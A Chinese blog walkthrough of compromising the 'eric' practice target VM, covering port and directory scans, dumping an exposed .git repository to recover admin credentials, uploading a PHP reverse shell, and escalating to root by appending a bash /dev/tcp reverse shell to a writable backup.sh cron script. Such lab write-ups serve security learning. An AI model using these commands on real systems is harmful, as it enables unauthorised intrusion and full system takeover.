首页 > 其他分享 >sp eric靶机

sp eric靶机

时间:2024-08-14 08:54:08浏览次数:6  
标签:shell sp 192.168 111.146 靶机 php backup eric python3

扫描IP

端口扫描

nmap 192.168.111.146 -p- -sV

目录扫描

# 使用命令
dirsearch -u  "http://192.168.111.146"

访问靶机IP地址

拼接访问 admin.php ,发现登录框界面,尝试sql注入,弱口令等,没有结果

看看 .git ,使用 githack 下载源码

# 使用命令
python2 GitHack.py -u http://192.168.111.146/.git/

查看下载的源码,发现账号密码admin:[email protected]$glo0mappL3

# 使用命令
cd 192.168.111.146
ls
cat admin.php

尝试登录,发现登录成功

发现存在文件上传功能,kali 生成反弹 shell

# 使用命令
locate php-reverse-shell.php
 
cp /usr/share/webshells/php/php-reverse-shell.php .
 
vim php-reverse-shell.php

kali 开启监听

访问 /upload/php-reverse-shell.php,成功反弹 shell

提权

使用 python 提升交互性,发现没有python

看一下有没有python3

发现有 python3,那么用 python3 执行

python3 -c 'import pty;pty.spawn("/bin/bash")'

/home/eric 下发现了 backup.shbackup.zipflag.txt 这三个文件

查看 flag.txt文件内容

查看 backup.sh文件内容,可能是计划任务,看一眼

输入ls -la命令,发现backup.sh文件可写可执行

写入反弹 shell 的语句

# 使用命令
echo 'bash -i >& /dev/tcp/192.168.111.147/9999 0>&1' >> backup.sh

kali开启监听

最后在 /root 下发现一个 flag.txt

标签:shell,sp,192.168,111.146,靶机,php,backup,eric,python3
From: https://blog.csdn.net/2401_84564260/article/details/141180807

相关文章

  • Broken靶机
    查看靶机的mac地址使用kail进行扫描ip探测靶机主机,端口,服务nmap-sS-sS-A-p-192.168.154.137进行目录扫描dirsearch-uhttp://192.168.154.137拼接后没什么发现访问靶机ip访问readme.md发现是十六进制的值将内容写入到readme.md中使用xxd转换xxd-r-......
  • Spring Cloud Gateway 实现简单自定义过滤器
    背景SpringCloudGateway是SpringCloud退出的第二代网关框架,我们可以用它来实现反向代理,路由转发,权限校验等功能,这里介绍一个它的基础功能,通过Filter机制实现一个简单的HTTP接口处理。从总体上来看SpringCloudGateway提供的过滤器可以分为两类,一种是对全局流量都......
  • c++ 线程函数传递数据 namespace
     CMakeLists.txt cmake_minimum_required(VERSION3.10)#Settheprojectnameproject(GlobalMatrixExample)#FindEigenpackagefind_package(Eigen33.3REQUIRED)#Findpthreadpackagefind_package(ThreadsREQUIRED)#Addexecutableadd_executable(g......
  • Spring入门讲解
    这里写目录标题Spring基础概念关键重点主要特性主要优势Spring与JavaEE的对比Spring生态系统概述总结Spring基础概念Spring是一个开源的轻量级Java开发框架,它提供了全面的基础设施支持,简化了企业级应用的开发和部署。Spring的核心理念是依赖注入(DI)和面向切面编程......
  • SPAN
    SPAN抓包方式:1.集线器2.networktap3.span/rspan4.vaclidsm:可以span/rspan,vaclsnm-cids:可以routerbackup杂合模式:抵达接口所有包都接收做span考虑1.源端口那些流量2.源端口那个方向的流量3.目的端口是哪4.sensor接收不接收数据interface:基于接口抓包vlan:基......
  • 计算机毕设&毕设项目&毕业设计:基于springboot+vue校园宿舍管理系统
    一、前言        传统的宿舍管理往往依赖于纸质记录和人工操作,这种方式不仅效率低下,而且容易出现错误。随着学生数量的增长和管理需求的多样化,这种传统模式已经难以满足当前的需求。基于此背景,引入SpringBoot作为后端框架和Vue.js作为前端框架,结合数据库技术和云计算......
  • 计算机毕设&毕设项目&毕业设计:基于SpringBoot+Vue实现人事管理系统
    一、前言        在当今快节奏的企业环境中,有效的人力资源管理是组织成功的关键。随着数字化转型的加速,基于现代技术栈的人事管理系统成为了提升HR部门效率、优化员工体验的必要工具。本文将介绍如何利用SpringBoot和Vue.js这两种流行的技术,构建一个高效、灵活且用户......
  • 基于springboot的美食推荐菜谱教程管理系统-开题免费【论文、源码】
      博主介绍:......
  • 基于springboot的大学生个人财务收入支出管理系统-JAVA.VUE【全套源码论文】
     博主介绍:......
  • 基于springboot的电商购物在线商城系统-JAVA.VUE【全套源码论文】
     博主介绍:......